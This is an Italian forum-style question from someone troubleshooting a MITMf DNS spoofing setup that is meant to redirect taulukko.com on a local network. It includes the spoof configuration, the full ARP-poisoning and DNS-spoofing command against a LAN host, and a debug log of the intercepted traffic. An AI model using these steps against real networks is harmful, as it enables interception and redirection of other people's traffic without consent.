Sto provando a reindirizzare una pagina di taulukko.com a google.com per scopi di apprendimento, ma senza successo.
Quando accedo a taulukko.com dal nodo di spoofing ricevo:
The webpage cannot be found
my mitmf.conf:
#Supported formats are 8.8.8.8#53 or 4.2.2.1#53#tcp or 2001:4860:4860::8888
#can also be a comma seperated list e.g 8.8.8.8,8.8.4.4
#
nameservers = 8.8.8.8
[[[A]]] # Queries for IPv4 address records
#*.thesprawls.org=192.0.2.1
*.taulukko.com=201.55.233.116
[[[AAAA]]] # Queries for IPv6 address records
*.thesprawl.org=2001:db8::1
[[[MX]]] # Queries for mail server records
*.thesprawl.org=mail.fake.com
[[[NS]]] # Queries for mail server records
*.thesprawl.org=ns.fake.com
[[[CNAME]]] # Queries for alias records
*.thesprawl.org=www.fake.com
[[[TXT]]] # Queries for text records
*.thesprawl.org=fake message
[[[PTR]]] # PTR queries
*.2.0.192.in-addr.arpa=fake.com
[[[SOA]]] #FORMAT: mname rname t1 t2 t3 t4 t5
*.thesprawl.org=ns.fake.com. hostmaster.fake.com. 1 10800 3600 604800 3600
[[[NAPTR]]] #FORMAT: order preference flags service regexp replacement
*.thesprawl.org=100 10 U E2U+sip !^.*$!sip:[email protected]! .
[[[SRV]]] #FORMAT: priority weight port target
*.*.thesprawl.org=0 5 5060 sipserver.fake.com
il comando:
mitmf -i wlan0 --spoof --arp --dns --gateway 192.168.0.1 --target 192.168.0.16 --log debug
il debug:
2016-02-20 18:05:47 [Utils] Setting iptables DNS redirection rule from port 53 to 53
2016-02-20 18:05:47 [Utils] Setting ip forwarding to 1
2016-02-20 18:05:47 [Utils] Flushing iptables
2016-02-20 18:05:47 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
2016-02-20 18:05:47 [ARPpoisoner] gatewayip => 192.168.0.1
2016-02-20 18:05:47 [ARPpoisoner] gatewaymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] targets => ['192.168.0.16']
2016-02-20 18:05:47 [ARPpoisoner] targetmac => None
2016-02-20 18:05:47 [ARPpoisoner] mymac => X:X:X:X:X:X
2016-02-20 18:05:47 [ARPpoisoner] interface => wlan0
2016-02-20 18:05:47 [ARPpoisoner] arpmode => rep
2016-02-20 18:05:47 [ARPpoisoner] interval => 3
2016-02-20 18:05:47 [ProxyPlugins] Adding Spoof plugin
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:47 [SMBserver] Callback added for UUID X-X-X-X-X V:3.0
2016-02-20 18:05:47 [SMBserver] Config file parsed
2016-02-20 18:05:49 [ClientRequest] Resolving host: www.taulukko.com
2016-02-20 18:05:49 [ClientRequest] Host not cached.
2016-02-20 18:05:49 [ClientRequest] Resolving with DNSChef
2016-02-20 18:05:49 [ClientRequest] Resolved host successfully: www.taulukko.com -> 201.55.233.116
2016-02-20 18:05:49 [ClientRequest] Zapped encoding
2016-02-20 18:05:49 [ClientRequest] Sending request via HTTP
2016-02-20 18:05:49 [ServerConnection] HTTP connection made.
2016-02-20 18:05:49 [ProxyPlugins] hooking connectionMade()
2016-02-20 18:05:49 192.168.0.16 [type:IE 8.0 os:Windows 7] Sending Request: www.taulukko.com
2016-02-20 18:05:49 [ServerConnection] Full request: www.taulukko.com/
2016-02-20 18:05:49 [ServerConnection] Sending header: (host: www.taulukko.com)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept-language: en-US)
2016-02-20 18:05:49 [ServerConnection] Sending header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Sending header: (accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*)
2016-02-20 18:05:49 [ServerConnection] Sending header: (user-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0))
2016-02-20 18:05:49 [ServerConnection] Server response: HTTP/1.0 404 Not Found
2016-02-20 18:05:49 [ProxyPlugins] hooking handleEndHeaders()
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-xss-protection: 1; mode=block)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (server: HTTP server (unknown))
2016-02-20 18:05:49 [ServerConnection] Receiving header: (connection: Keep-Alive)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (date: Sat, 20 Feb 2016 20:05:49 GMT)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (x-frame-options: SAMEORIGIN)
2016-02-20 18:05:49 [ServerConnection] Receiving header: (content-type: text/html)
2016-02-20 18:05:49 [ProxyPlugins] hooking handleResponse()
2016-02-20 18:05:49 [ServerConnection] Read from server 49 bytes of data
2016-02-20 18:05:54 [ARPpoisoner] Restoring connection 192.168.0.16 <-> 192.168.0.1 with 2 packets per host
2016-02-20 18:05:54 [Utils] Flushing iptables
2016-02-20 18:05:54 [Utils] Setting ip forwarding to 0